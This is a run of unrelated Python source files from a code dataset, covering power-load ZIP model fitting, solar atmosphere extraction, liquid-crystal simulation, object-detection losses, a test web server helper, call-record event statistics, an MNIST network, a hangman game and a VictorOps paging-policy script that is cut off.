q[i] < 0:\n            # Leading power factor\n            pf *= -1\n        elif p[i] < 0 and q[i] < 0:\n            # Negative load, flip the fraction\n            fraction *= -1\n        elif p[i] < 0 and q[i] > 0:\n            # Negative load and leading power factor, flip both.\n            pf *= -1\n            fraction *= -1\n        \n        # Assign to return.\n        out[k + '_fraction'] = fraction\n        out[k + '_pf'] = pf\n        \n        # Increment index counter\n        i += 1\n    \n    return out\n    \ndef gldZIP(V, coeff, Vn):\n    \"\"\"Computes P and Q from ZIP coefficients and voltage as GridLAB-D does.\n    \n    This is not meant to be optimal/efficient, but rather a rewrite of how\n    GridLAB-D performs it for testing purposes.\n    \n    Check out the 'triplex_load_update_fxn()' in:\n    https://github.com/gridlab-d/gridlab-d/blob/master/powerflow/triplex_load.cpp\n    \"\"\"\n    d = {}\n    for k in ZIPTerms:\n        real = coeff['base_power']*coeff[k+'_fraction']*abs(coeff[k+'_pf'])\n        imag = real * math.sqrt(1/coeff[k+'_pf']**2 - 1)\n        \n        if coeff[k +'_pf'] < 0:\n            imag *= -1\n        \n        d[k] = (real, imag)\n    \n    # Compute P and Q\n    P = (\n        (V**2/Vn**2) * d['impedance'][0]\n        + (V/Vn) * d['current'][0]\n        + d['power'][0]\n    )\n    \n    Q = (\n        (V**2/Vn**2) * d['impedance'][1]\n        + (V/Vn) * d['current'][1]\n        + d['power'][1]\n    )\n    \n    return P, Q\n\nif __name__ == '__main__':\n    # Get voltage array\n    V = np.arange(0.95*240, 1.05*240)\n    Vn = 240\n    #**************************************************************************\n    # Constant current\n    I = 1+1j\n    S = V * np.conjugate(I)\n    P_constI = np.real(S)\n    Q_constI = np.imag(S)\n    m = zipFit(V, P_constI, Q_constI, solver='fmin_powell')\n    P_M, Q_M = gldZIP(V, m, Vn)\n    s = zipFit(V, P_constI, Q_constI, solver='SLSQP')\n    P_S, Q_S = gldZIP(V, s, Vn)\n    print('Finished constant current test.')\n    #**************************************************************************\n    # Constant impedance\n    Z = 1+1j\n    I = V / Z\n    S = V * np.conjugate(I)\n    P_constI = np.real(S)\n    Q_constI = np.imag(S)\n    m = zipFit(V, P_constI, Q_constI, solver='fmin_powell')\n    P_M, Q_M = gldZIP(V, m, Vn)\n    s = zipFit(V, P_constI, Q_constI, solver='SLSQP')\n    P_S, Q_S = gldZIP(V, s, Vn)\n    print('Finished constant impedance test.')\n    #**************************************************************************\n    # Constant power\n    S = np.ones_like(V) * 1+1j\n    P_constI = np.real(S)\n    Q_constI = np.imag(S)\n    m = zipFit(V, P_constI, Q_constI, solver='fmin_powell')\n    P_M, Q_M = gldZIP(V, m, Vn)\n    s = zipFit(V, P_constI, Q_constI, solver='SLSQP')\n    P_S, Q_S = gldZIP(V, s, Vn)\n    print('Finished constant power test.')\n    #**************************************************************************\n    # Mixture\n    # Constant impedance:\n    Z = 1+1j\n    I_z = V /Z\n    S_z = V * np.conjugate(I_z)\n    # Constant current:\n    I = 1+1j\n    S_i = V * np.conjugate(I)\n    # Constant power.\n    S_p = np.ones_like(V) * 1+1j\n    # Combine\n    S_tot = S_z + S_i + S_p\n    P_tot = np.real(S_tot)\n    Q_tot = np.imag(S_tot)\n    m = zipFit(V, P_tot, Q_tot, solver='fmin_powell')\n    P_M, Q_M = gldZIP(V, m, Vn)\n    s = zipFit(V, P_tot, Q_tot, solver='SLSQP')\n    P_S, Q_S = gldZIP(V, s, Vn)\n    print('Finished mixture test.')\n    \n    # 
TODO","sub_path":"pyvvo/app/zipModel.py","file_name":"zipModel.py","file_ext":"py","file_size_in_byte":9050,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"193023442","text":"import os\nfrom bifrost_extractor import BifrostExtractor\n\nif not os.path.exists('out'):\n os.makedirs('out')\n\nbe = BifrostExtractor('en024031_emer3.0med', 438, fdir='/mn/stornext/d7/larsfrog/en024031_emer3.0med',\n precentered=1, folder='out', save='full', fromfolder=0, verbose=1)\n\npositions = be.get_start_positions(n_positions=80, z_lims=(-14.0, -3.0), e=(6, 6, 6))\nbe.extract_fieldlines(positions, L=15, direction='forward', z_decoupling=('>', -0.1), z_termination=('>', 0.3))\nbe.extract_fieldlines(positions, L=15, direction='backward', z_decoupling=('>', -0.1), z_termination=('>', 0.3))\n\nbe.generate_multi_atmos_file('A1', 10, 300, vturb_val=2.0, use_vl=False, force=False, reverse_grav=True)\nbe.generate_multi_atmos_file('A2', 54, 300, vturb_val=2.0, use_vl=False, force=False, reverse_grav=True)\nbe.generate_multi_atmos_file('A3', 48, 300, vturb_val=2.0, use_vl=False, force=False, reverse_grav=True)\n\nbe.fieldlines.plot_fieldline_profiles(marker='-', n_linepoints=400, numbers=0, savename='init_height_profiles.eps', line_nums=[10, 54, 48], linewidth=1, fontsize=8, showlabels=1, labels=['A1', 'A2', 'A3'])\nbe.fieldlines.plot_quantities('tg', marker='-', ylog=True, savename='init_temperatures.eps', line_nums=[10, 54, 48], linewidth=2, fontsize=13, showlabels=1, labels=['A1', 'A2', 'A3'], quantity_des=r'$T_g$ [K]')\nbe.fieldlines.plot_quantities('r', marker='-', ylog=True, savename='init_densities.eps', line_nums=[10, 54, 48], linewidth=2, fontsize=13, showlabels=1, labels=['A1', 'A2', 'A3'], quantity_des=r'$\\rho$ [g$/$cm$^3$]')\n","sub_path":"src/get_atmospheres.py","file_name":"get_atmospheres.py","file_ext":"py","file_size_in_byte":1567,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"7995878","text":"import numpy as np\n\nfrom ldgsim import utility as u\nfrom ldgsim import param as p\nfrom ldgsim import mesh as m\n\n\"\"\" grid selectors \"\"\"\n\ndef is_top(grid):\n\tif grid.r[2] == p.axis_z[0]:\n\t\treturn True\n\treturn False\n\ndef is_bot(grid):\n\tif grid.r[2] == p.axis_z[-1]:\n\t\treturn True\n\treturn False\n\ndef is_osh(grid, thickness=p.dx, radius=p.r_nog):\n\td = np.linalg.norm(grid.r)\n\tif (d >= radius and abs(d - radius) < thickness):\n\t\treturn True\n\treturn False\n\ndef is_ish(grid, thickness=p.dx, radius=p.r_nog):\n\td = np.linalg.norm(grid.r)\n\tif (d < radius and abs(d - radius) < thickness):\n\t\treturn True\n\treturn False\n\n\n\"\"\" apply the boundary conditions and initial conditions \"\"\"\n\ndef envelope(grid, trend=p.n_shel):\n\t''' calculate the orientation around the sphere under a special arrangement '''\n\tN = u.cartesian(trend)\n\tr = u.cartesian(grid.r)\n\treturn N - np.dot(N, r) * r\n\ndef rotate(grid, alignment=p.n_subs, trend=p.n_shel, bias=p.n_bias):\n\t''' grid-based molecule orientation rotator '''\n\tif is_top(grid) or is_bot(grid):\n\t\tgrid.n = np.array(alignment)\n\telif is_osh(grid):\n\t\tgrid.n = envelope(grid, trend)\n\telif is_ish(grid):\n\t\tgrid.n = envelope(grid, trend - u.cartesian(bias))\n\telse:\n\t\tgrid.n = np.array(alignment)\t# bulk initial condition\nRotate = np.vectorize(rotate)\n\ndef reorder(grid, S_subs=p.S_subs, S_cent=p.S_cent, S_init=p.S_init):\n\t''' reassign the degree of order of liquid crystal molecule '''\n\tif is_top(grid) 
or is_bot(grid):\n\t\tgrid.S = S_subs\n\telif is_ish(grid):\n\t\tgrid.S = S_cent\n\telse:\n\t\tgrid.S = S_init\nReorder = np.vectorize(reorder)","sub_path":"ldgsim/cond.py","file_name":"cond.py","file_ext":"py","file_size_in_byte":1549,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"352921091","text":"import tensorflow as tf\nimport tensorflow.keras as tfk\n\nfrom squeezedet.utils import iou\n\n\nclass ClassLoss(tfk.losses.Loss):\n def __init__(self, epsilon=1e-16):\n super(ClassLoss, self).__init__(\n reduction=tfk.losses.Reduction.SUM)\n self.epsilon = epsilon\n\n def call(self, y_true, y_pred):\n num_objects = tf.math.count_nonzero(\n y_pred._keras_mask, dtype=tf.float32)\n\n diff = tf.math.reduce_sum(\n y_true * (-tf.math.log(y_pred + self.epsilon)) +\n (1 - y_true) * (-tf.math.log(1 - y_pred + self.epsilon)), axis=-1)\n\n diff = tf.nn.softmax_cross_entropy_with_logits(y_true, y_pred)\n\n return diff / num_objects\n\n\nclass ConfidenceLoss(tfk.losses.Loss):\n def __init__(self, epsilon=1e-16):\n super(ConfidenceLoss, self).__init__(\n reduction=tfk.losses.Reduction.SUM)\n self.epsilon = epsilon\n\n def call(self, y_true, y_pred):\n num_objects = tf.math.count_nonzero(\n y_pred._keras_mask, dtype=tf.float32)\n\n confidence, bboxes = tf.split(y_pred, [1, 4], axis=-1)\n\n ious = iou(y_true, bboxes, epsilon=self.epsilon)\n diff = tf.math.square(ious - tf.squeeze(confidence, -1)) / 20\n\n return diff / num_objects\n\n\nclass BboxLoss(tfk.losses.Loss):\n def __init__(self):\n super(BboxLoss, self).__init__(\n reduction=tfk.losses.Reduction.SUM)\n\n def call(self, y_true, y_pred):\n num_objects = tf.math.count_nonzero(\n y_pred._keras_mask, dtype=tf.float32)\n\n diff = tf.math.reduce_sum(tf.math.square(y_true - y_pred), axis=-1)\n\n return diff / num_objects\n","sub_path":"squeezedet/legacy/losses.py","file_name":"losses.py","file_ext":"py","file_size_in_byte":1654,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"524263453","text":"import unittest\nimport sys\nimport os\nimport time\nimport threading\nfrom six.moves.socketserver import TCPServer\n\n# There needs to be a file named test_web_server next to this file with a class named TestWebServerHandler that inherits from BaseHTTPServer.BaseHTTPRequestHandler\nfrom test_web_server import TestWebServerHandler\n\nclass UnitTestWithWebServer(unittest.TestCase):\n \"\"\"\n This test class runs a web-server for the purposes of testing with a live web-server.\n \"\"\"\n \n DEFAULT_TEST_WEB_SERVER_PORT = 8888\n warned_about_no_httpd = False\n httpd = None\n \n @classmethod\n def setUpClass(cls):\n \n cls.web_server_port = int(os.environ.get(\"TEST_WEB_SERVER_PORT\", cls.DEFAULT_TEST_WEB_SERVER_PORT))\n \n # Stop if the web-server was already started\n if UnitTestWithWebServer.httpd is not None:\n return\n \n attempts = 0\n \n sys.stdout.write(\"Waiting for web-server to start ...\")\n sys.stdout.flush()\n \n while UnitTestWithWebServer.httpd is None and attempts < 75:\n try:\n UnitTestWithWebServer.httpd = cls.get_server(cls.web_server_port)\n \n print(\" Done\")\n \n except IOError:\n UnitTestWithWebServer.httpd = None\n time.sleep(4)\n attempts = attempts + 1\n sys.stdout.write(\".\")\n sys.stdout.flush()\n \n if UnitTestWithWebServer.httpd is None:\n print(\"Web-server could not be started\")\n return\n \n def start_server(httpd):\n if httpd is not None:\n httpd.serve_forever()\n \n t = threading.Thread(target=start_server, args = 
(UnitTestWithWebServer.httpd,))\n t.daemon = True\n t.start()\n \n @classmethod\n def shutdownServer(cls):\n if UnitTestWithWebServer.httpd is not None:\n UnitTestWithWebServer.httpd.shutdown()\n UnitTestWithWebServer.httpd = None\n \n def test_if_web_server_is_running(self):\n if UnitTestWithWebServer.httpd is None and not UnitTestWithWebServer.warned_about_no_httpd:\n UnitTestWithWebServer.warned_about_no_httpd = True\n self.fail(\"The test web-server is not running; tests that rely on the built-in web-server will fail or be skipped\")\n \n @classmethod\n def get_server(cls, port):\n \"\"\"\n Call httpd.shutdown() to stop the server\n \"\"\"\n \n httpd = TCPServer((\"\", port), TestWebServerHandler)\n return httpd\n \ndef skipIfNoServer(func):\n def _decorator(self, *args, **kwargs):\n if self.httpd is None:\n # Don't run the test if the server is not running\n self.skipTest(\"The web-server is not running\")\n else:\n return func(self, *args, **kwargs)\n \n return _decorator","sub_path":"tests/unit_test_web_server.py","file_name":"unit_test_web_server.py","file_ext":"py","file_size_in_byte":2954,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"389186159","text":"import pandas as pd\nimport math\nfrom scipy.stats import norm\nimport numpy as np\n\ntabulato = pd.read_csv(\"../dati_pre_eventi/data/tabulato_semplificato.csv\")\neventi1 = pd.read_csv(\"creazione_eventi/data/events/events1.csv\")\npartsXY = {}\nfinestra = 43200\n\n\ndef group_e1():\n global eventi1\n eventi1 = eventi1.drop(columns=[\"timestamp2\"])\n eventi1[\"chiamate\"] = eventi1[\"esito_positivo\"] + eventi1[\"esito_negativo\"]\n eventi1 = eventi1.drop(columns=[\"esito_positivo\", \"esito_negativo\"])\n events1dfgrouped = eventi1.groupby(by=[\"timestamp\", \"X\", \"Y\", \"Z\"], as_index=False).sum()\n eventi1 = events1dfgrouped\n\n\ndef get_part_a_xy(x, y):\n eventsxy = eventi1[eventi1[\"X\"] == x]\n eventsxy = eventsxy[eventsxy[\"Y\"] == y]\n intervals = []\n\n if len(eventsxy) != 0:\n start = 0\n start_finestra = True\n prec = 0\n end = 0\n for i, row in eventsxy.iterrows():\n if start_finestra:\n start = row[\"timestamp\"]\n start_finestra = False\n if row[\"timestamp\"] > start + finestra:\n intervals.append((start, prec + finestra))\n start = row[\"timestamp\"]\n if i == len(eventsxy) - 1:\n end = row[\"timestamp\"]\n prec = row[\"timestamp\"]\n\n intervals.append((start, end + finestra))\n return intervals\n\n\ndef get_part_b_xy(partA, minT, maxT):\n intervals = []\n if len(partA) != 0:\n start = minT\n for item in partA:\n end = item[0] - 1\n intervals.append((start, end))\n start = item[1] + 1\n intervals.append((start, maxT))\n return intervals\n else:\n return [(minT, maxT)]\n\n\ndef get_p0(x, y, z):\n partB = partsXY[(x, y)][\"B\"]\n tabulato_yz = tabulato[tabulato[\"mittente\"] == y]\n tabulato_yz = tabulato_yz[tabulato_yz[\"destinatario\"] == z]\n tabulato_yz.reset_index(inplace=True, drop=True)\n c = 0\n for _, row in tabulato_yz.iterrows():\n timestamp = row[\"timestamp\"]\n for item in partB:\n if item[0] <= timestamp <= item[1]:\n c += 1\n break\n if timestamp < item[0]:\n break\n return c / len(tabulato) # TODO: togliere filtro\n\n\ndef get_p_cappuccio(x, y, z):\n eventsxy = eventi1[eventi1[\"X\"] == x]\n eventsxy = eventsxy[eventsxy[\"Y\"] == y]\n eventsxy.reset_index(inplace=True, drop=True)\n eventsxyz = eventsxy[eventsxy[\"Z\"] == z]\n eventsxyz.reset_index(inplace=True, drop=True)\n return eventsxyz[\"chiamate\"].sum() / 
eventi1[\"chiamate\"].sum() # TODO? su tutti gli eventi\n\n\ndef calcolo_p0_p_hat():\n global tabulato\n minT = tabulato[\"timestamp\"].min()\n maxT = tabulato[\"timestamp\"].max()\n tabulato = tabulato[tabulato[\"is_mittente_intercettato\"] == \"S\"]\n tabulato = tabulato[tabulato[\"is_destinatario_intercettato\"] == \"S\"]\n tabulato_coppie = tabulato\n tabulato_coppie = tabulato_coppie.drop(\n columns=[\"timestamp\", \"durata\", \"is_mittente_intercettato\", \"mittente_cella_start\", \"mittente_cella_end\",\n \"is_destinatario_intercettato\", \"destinatario_cella_start\", \"destinatario_cella_end\", \"esito_chiamata\",\n \"tipo\"])\n tabulato_coppie.drop_duplicates(inplace=True)\n tabulato_coppie.reset_index(inplace=True, drop=True)\n for i, row in tabulato_coppie.iterrows():\n x = row[\"mittente\"]\n y = row[\"destinatario\"]\n partsXY[(x, y)] = {}\n partsXY[(x, y)][\"A\"] = get_part_a_xy(x, y)\n partsXY[(x, y)][\"B\"] = get_part_b_xy(partsXY[(x, y)][\"A\"], minT, maxT)\n p0 = []\n p_cappuccio = []\n for i, row in eventi1.iterrows():\n x = row[\"X\"]\n y = row[\"Y\"]\n z = row[\"Z\"]\n p0.append(get_p0(x, y, z))\n p_cappuccio.append(get_p_cappuccio(x, y, z))\n eventi1[\"p0\"] = p0\n eventi1[\"p_cappuccio\"] = p_cappuccio\n eventi1.to_csv(\"data/events1_sign.csv\", index=False)\n\n\ndef n_chiamate_xy():\n global tabulato\n tabulato_coppie = tabulato\n tabulato_coppie = tabulato_coppie.drop(\n columns=[\"timestamp\", \"durata\", \"is_mittente_intercettato\", \"mittente_cella_start\", \"mittente_cella_end\",\n \"is_destinatario_intercettato\", \"destinatario_cella_start\", \"destinatario_cella_end\", \"esito_chiamata\",\n \"tipo\"])\n tabulatof = tabulato_coppie.groupby(tabulato_coppie.columns.tolist()).size().reset_index().rename(\n columns={0: 'n_telefonate'})\n for i, row in tabulatof.iterrows():\n # partsXY[(row[\"mittente\"], row[\"destinatario\"])] = {}\n partsXY[(row[\"mittente\"], row[\"destinatario\"])][\"n_telefonate\"] = row['n_telefonate']\n return\n\n\ndef calcolo_z():\n eventi_p = pd.read_csv(\"data/events1_sign.csv\")\n z = []\n for i, row in eventi_p.iterrows():\n p_hat = row[\"p_cappuccio\"]\n p0 = row[\"p0\"] # if row[\"p0\"] != 0 else zero_probability_factor\n n = partsXY[(row[\"X\"], row[\"Y\"])][\"n_telefonate\"]\n root = math.sqrt((p0 * (1 - p0)) / n)\n z.append((p_hat - p0) / root)\n eventi_p[\"z\"] = z\n eventi_p.to_csv(\"data/events1_sign.csv\", index=False)\n\n return\n\n\ndef calcolo_sign():\n eventi_z = pd.read_csv(\"data/events1_sign.csv\")\n sign = []\n for i, row in eventi_z.iterrows():\n p = 1 - norm.cdf(row[\"z\"])\n sign.append(p)\n eventi_z[\"significativo\"] = sign\n eventi_z.to_csv(\"data/events1_sign.csv\", index=False)\n return\n\n\nif __name__ == \"__main__\":\n print(\"Inizio\")\n group_e1()\n calcolo_p0_p_hat()\n n_chiamate_xy()\n calcolo_z()\n calcolo_sign()\n print(\"Fine\")\n","sub_path":"window_43200/events1_sign.py","file_name":"events1_sign.py","file_ext":"py","file_size_in_byte":5559,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"507259960","text":"import numpy as np\nimport random\nimport time\nfrom mnist import MNIST\n\ndef loadData():\n mndata = MNIST('../mnist-data')\n mndata.gz = True\n trainData = mndata.load_training()\n testData = mndata.load_testing()\n return trainData, testData\ndef loadDataWrapper():\n trd, ted = loadData()\n trainInputs = [np.reshape(x,(784,1)) for x in trd[0]]\n trainInputs = np.multiply((1.0/255.0),np.array(trainInputs))\n trainResults = 
[vectorizedResult(y) for y in trd[1]]\n trainData = list(zip(trainInputs, trainResults))\n testInputs = [np.reshape(x,(784,1)) for x in ted[0]]\n testInputs = np.multiply((1.0/255.0),np.array(testInputs))\n testData = list(zip(testInputs,ted[1]))\n return trainData,testData\ndef vectorizedResult(i):\n e = np.zeros((10,1))\n e[i] = 1.0\n return e\n\ndef testWrapper(func, args):\n return func(args)\n\ndef sigmoid(z):\n return 1.0/(1.0+np.exp(-z))\ndef sigmoidPrime(z):\n return(sigmoid(z)*(1-sigmoid(z)))\n\neps = 1e-8\n\nclass Network():\n def __init__(self, layers):\n #### Initialize weight and bias arrays with random values\n self.numLayers = len(layers)\n self.layers = layers\n self.biases = [np.random.randn(y,1) for y in layers[1:]]\n self.weights = [np.random.randn(y,x) for x,y in zip(\n layers[:-1],layers[1:])]\n #### Arrays used for rolling cost accumulation\n self.eRho = np.array([0.02,0.08,0.3,0.6])\n self.ePast = [[np.array([np.zeros(y)]).T for x in range(4)] \\\n for y in layers[1:]]\n self.grads = [[np.array([np.zeros(y)]).T for x in range(4)] \\\n for y in layers[1:]]\n \n def __del__(self):\n print(\"Deleted Network\")\n \n def FeedForward(self,a):\n for b,w in zip(self.biases,self.weights):\n a = sigmoid(np.dot(w,a)+b)\n return a\n \n def Backprop(self, x, y):\n #### Initialize delta vectors for bias/weight with zeros.\n deltaB = [np.zeros(b.shape) for b in self.biases]\n deltaW = [np.zeros(w.shape) for w in self.weights]\n #### Feed Forward z^l=w^l a^(l-1) + b^l and a^l=sig(z^l)\n activation = x\n activations = [x]\n zs = []\n for b,w in zip(self.biases,self.weights):\n z = np.dot(w,activation)+b\n zs.append(z)\n activation = sigmoid(z)\n activations.append(activation)\n #### Calculate Error E^l=delta_a C * sigprime(z^L)\n gradient= activations[-1]-y\n self.updateErrors(gradient, self.numLayers-2)\n delta = gradient*sigmoidPrime(zs[-1])\n deltaB[-1] = delta\n deltaW[-1] = np.dot(delta,activations[-2].T)\n #### Backpropagate Error\n for i in reversed(range(0,self.numLayers-2)):\n #### Calculate E^l=((w^(l+1)^T E^(l+1)) * sigprime(z^l))\n delta = np.dot(self.weights[i+1].T,delta)*sigmoidPrime(zs[i])\n #### Calculate dC/dw_jk^l = a_k^(l-1) E_j^l and dC/db_j^l = E_j^l\n deltaB[i] = delta\n deltaW[i] = np.dot(activations[i+1].T,delta)\n self.updateErrors(deltaW[i], i)\n return(deltaB,deltaW)\n\n def RMSProp(self, trainData, epochs, miniBatchSize, alpha, testData=None):\n n = len(trainData)\n #### Repeat train process for number of epochs specified\n for i in range(1, epochs+1):\n random.shuffle(trainData)\n miniBatches = [trainData[x:x+miniBatchSize] \\\n for x in range(0,n,miniBatchSize)]\n #### Calculate minibatch gradients\n for miniBatch in miniBatches:\n self.getMiniBatchGradient(miniBatch, alpha)\n \n #### If testData is passed in, forward pass and compare results then print\n if testData:\n nTest = len(testData)\n tempEval = self.evaluate(testData)\n print(\"Epoch {0}: {1} / {2}\".format(i, tempEval, nTest))\n else:\n print(\"Epoch {0} complete\".format(i))\n \n def updateErrors(self, gradient, layer):\n self.ePast[:-1] = self.ePast[1:];\n self.ePast[layer][-1] = np.multiply(0.9,self.ePast[layer][-1]) + \\\n np.multiply(0.1,gradient**2)\n self.ePast[layer][-1] = np.array([np.multiply(np.array( \\\n self.ePast[layer]).T[0],self.eRho).T.sum(axis=0)]).T\n \n self.grads[:-1] = self.grads[1:];\n self.grads[layer][-1] = gradient\n self.grads[layer][-1] = np.array([np.multiply(np.array( \\\n self.grads[layer]).T,self.eRho).T.sum(axis=0)]).T\n \n def evaluate(self, testData):\n res 
= [(np.argmax(self.FeedForward(x)),y) for x,y in testData]\n return sum(int(x==y) for x,y in res)\n \n def getMiniBatchGradient(self, miniBatch, alpha):\n nBiases = [np.zeros(b.shape) for b in self.biases]\n nWeights = [np.zeros(w.shape) for w in self.weights]\n\n for x,y in miniBatch:\n dnBiases,dnWeights = self.Backprop(x,y)\n\n nBiases = [nb+dnb for nb,dnb in zip(nBiases,dnBiases)]\n nWeights = [nw+dnw for nw,dnw in zip(nWeights,dnWeights)]\n self.weights = [w-np.multiply(alpha,g[-1])/np.sqrt(e[-1]+eps) \\\n for w,g,e in zip(self.weights,self.grads,self.ePast)]\n self.biases = [b-(alpha/len(miniBatch))*nb\n for b, nb in zip(self.biases, nBiases)]\n \n \n \n \ntrainData, testData = loadDataWrapper()\nnet = Network([784,35,15,20,10])\nnet.RMSProp(trainData[:5000], 30, 15, 0.001, testData[:500])","sub_path":"Spring 2018/Design and Analysis of Algorithms/Research Project/Testing/CustomFull.py","file_name":"CustomFull.py","file_ext":"py","file_size_in_byte":5517,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"292197694","text":"'''\nCreated on Thu Feb 13 10:40:09 2020\n\n@author: starstorms\n'''\nimport urllib.request as request\nimport random as rn\n\nclass hangPerson() :\n def __init__(self, max_attempts) :\n self.words = self.Word()\n self.max_attempts = max_attempts\n self.guesses = []\n \n def reset(self) :\n self.guesses = []\n self.words.chooseNewSecret()\n \n def playMutli(self) :\n while True :\n self.playGame()\n playAgain = input('Want to play again? [y/n]')\n if (playAgain.lower() == 'y') :\n self.reset()\n continue\n else:\n print('Goodbye!')\n break\n \n def playGame(self) :\n while True :\n self.showGame()\n guess = self.getInput()\n self.guesses.append(guess)\n won, game_over = self.checkWin()\n if (won) :\n print('You won!')\n return\n if (game_over) :\n print('You lost! Secret word was: {}'.format(self.words.secretWord))\n return\n \n def getInput(self) :\n while True:\n guess = input('What is your guess? ')\n if (guess.isalpha() and len(guess)==1) :\n if (guess in self.guesses) :\n print('Already guessed {}. 
Try again'.format(guess))\n print('So far you have guessed: {}'.format(sorted(self.guesses)))\n continue\n \n if (guess in self.words.secretWord) :\n print('\\nLucky guess, {} is in the secret word'.format(guess))\n else :\n print('\\nBad guess, {} is not in the secret word'.format(guess))\n \n return guess.lower()\n else:\n print('Invalid input, try again.')\n \n def checkWin(self) :\n won = True\n for sc in self.words.secretWord :\n if (not sc in self.guesses) :\n won = False\n break\n \n return won, (self.gotWrong() >= self.max_attempts)\n \n def gotWrong(self) :\n wrong = 0\n for g in self.guesses :\n if (not g in self.words.secretWord) :\n wrong += 1\n return wrong\n \n def showGame(self) :\n print('\\n')\n for c in self.words.secretWord :\n print(' ' + c if c in self.guesses else ' _', end='')\n print('\\nYou have {} guesses remaining.'.format(self.max_attempts - self.gotWrong()))\n \n class Word() :\n def __init__(self) :\n self.all_words = ['hello', 'break', 'noppe'] # self.getWords()\n self.chooseNewSecret()\n \n def getWords(self) :\n self.target_url = \"https://www.norvig.com/ngrams/sowpods.txt\"\n data = request.urlopen(self.target_url)\n words = list()\n for word in data:\n words.append(word.decode(\"utf-8\").strip())\n \n def chooseNewSecret(self) :\n self.secretWord = rn.choice(self.all_words)\n \n#%%\nhp = hangPerson(4)\nhp.playGame()","sub_path":"hangperson/Tyler_Habowski_Hangperson_V1.py","file_name":"Tyler_Habowski_Hangperson_V1.py","file_ext":"py","file_size_in_byte":3153,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"76460264","text":"#!/usr/bin/python\nimport requests, json, time\n\n#DEFINE PAGING POLICY\n\npolicy = {\n \"steps\": [\n {\n\t\t \"index\": 0,\n\t\t \"timeout\": 5,\n\t\t \"rules\": [\n\t\t {\n\t\t \"index\": 0,\n\t\t \"type\": \"phone\"\n\t\t },\n\t\t {\n\t\t \t\"index\": 1,\n\t\t \t\"type\": \"email\" # defaults to push if not activated\n\t\t },\n\t\t {\n\t\t \t\"index\": 2,\n\t\t \t\"type\": \"push\"\n\t\t },\n\t\t {\n\t\t \t\"index\": 3,\n\t\t \t\"type\": \"sms\"\n\t\t }\n\t\t ]\n\t\t},\n\t\t{\n\t\t\t\"index\": 1,\n\t\t \"timeout\": 10,\n\t\t \"rules\": [\n\t\t {\n\t\t \"index\": 0,\n\t\t \"type\": \"sms\"\n\t\t },\n\t\t {\n\t\t \t\"index\": 1,\n\t\t \t\"type\": \"phone\"\n\t\t }\n\t\t ]\n\t\t},\n\t\t{\n\t\t\t\"index\": 2,\n\t\t \"timeout\": 15,\n\t\t \"rules\": [\n\t\t {\n\t\t \"index\": 0,\n\t\t \"type\": \"push\"\n\t\t },\n\t\t {\n\t\t \t\"index\": 1,\n\t\t \t\"type\": \"email\" # defaults to push if not activated\n\t\t }\n\t\t ]\n\t\t}\n ]\n}\n\n#static urls\nuserPpUrl = \"https://api.victorops.com/api-public/v1/profile/\"\n\n#Update API Credentials\nheadersPub = {\n\t 'Content-type': \"application/json\",\n\t 'X-VO-Api-Id': '[API ID]',\n\t 'X-VO-Api-Key': '[API KEY]',\n\t 'cache-control': \"no-cache\",\n\t }\n\ndef getUsers():\n\t#no rate limit check as this call is only made once\n\tres = requests.request(\"GET\", 'https://api.victorops.com/api-public/v1/user', headers=headersPub)\n\tres.json()\n\treturn json.loads(res.text)['users'][0]\n\ndef clearPp(user):\n\t#set timer for rate limit\n\tt = time.process_time()\n\n\t# print user['pagingPolicy']\n\n\t#create copy of new dict to return at the end\n\tnewPolicy = dict(user['pagingPolicy'])\n\n\t#for each step in policy\n\tfor step in reversed(user['pagingPolicy']['steps']):\n\t\ts = step['index']\n\t\tfor rule in reversed(step['rules']):\n\t\t\t#get step and \n\t\t\tr = rule['index']\n\n\t\t\t#can't delete rule zero and step zero of policy, 
leave it there\n\t\t\tif r + s == 0:\n\t\t\t\tbreak\n\n\t\t\t#define url\n\t\t\turl = userPpUrl + user['username'] + \"/policies/\" + str(s) + \"/\" +str(r)\n\n\t\t\t#make DELETE request\n\t\t\tresponse = requests.request(\"DELETE\", url, headers=headersPub)\n\n\t\t\t#handle rate limits\n\t\t\twhile response.status_code == 403:\n\t\t\t\t#wait until minute has passed\n\t\t\t\twait = t + 5 - time.process_time()\n\t\t\t\tprint('waiting ', str(wait), 'seconds. . .')\n\t\t\t\ttime.sleep(wait)\n\t\t\t\t#reset timer to current time\n\t\t\t\tt = time.process_time()\n\n\t\t\t\t#retry\n\t\t\t\tresponse = requests.request(\"GET\", url, headers=headersPub)\n\n\t\t\t#if success, update return policy\n\t\t\tif response.status_code == 200:\n\t\t\t\t#update policy\n\t\t\t\tdel newPolicy['steps'][s]['rules'][r]\n\t\t\n\t\t\t#NON-RATE LIMIT FAILURE\n\t\t\telse:\n\t\t\t\tprint(user['username'] + ' - Failed to delete rule ' + r + 'of step ' + s + '. - ' + str(response.status_code))\n\t\t\t\tprint(str(response.text) + '\\n----------\\n')\n\t\t#update return policy\n\t\tdel newPolicy['steps'][s]\n\t#return copy of new policy to update user\n\treturn newPolicy\n\ndef setUserPp(user, policy):\n\n\tfor step in policy['steps']:\n\t\t#first step needs a PUT\n\t\tif step['index'] == 0:\n\t\t\tputPpStep(user, policy['steps'][0])\n\n\t\t#if more than one step, post them as new steps.\n\t\telse:\n\t\t\tpostPpStep(user, step)\n\n\ndef putPpStep(user, step):\n\n\t#start timer\n\tt=time.process_time()\n\t\n\turl = userPpUrl + user['username'] + \"/policies/0\"\n\n\t#build payload\n\tpayload = buildUserStep(user, step)\n\n\tresponse = requests.request(\"PUT\", url, data=json.dumps(step), headers=headersPub)\n\n\t#RATE LIMITS\n\twhile response.status_code == 403:\n\t\t#wait until minute has passed\n\t\twait = t + 5 - time.process_time()\n\t\tprint('waiting ', str(wait), 'seconds. . .')\n\t\ttime.sleep(wait)\n\t\t#reset timer to current time\n\t\tt = time.process_time()\n\n\t\t#retry\n\t\tresponse = requests.request(\"PUT\", url, 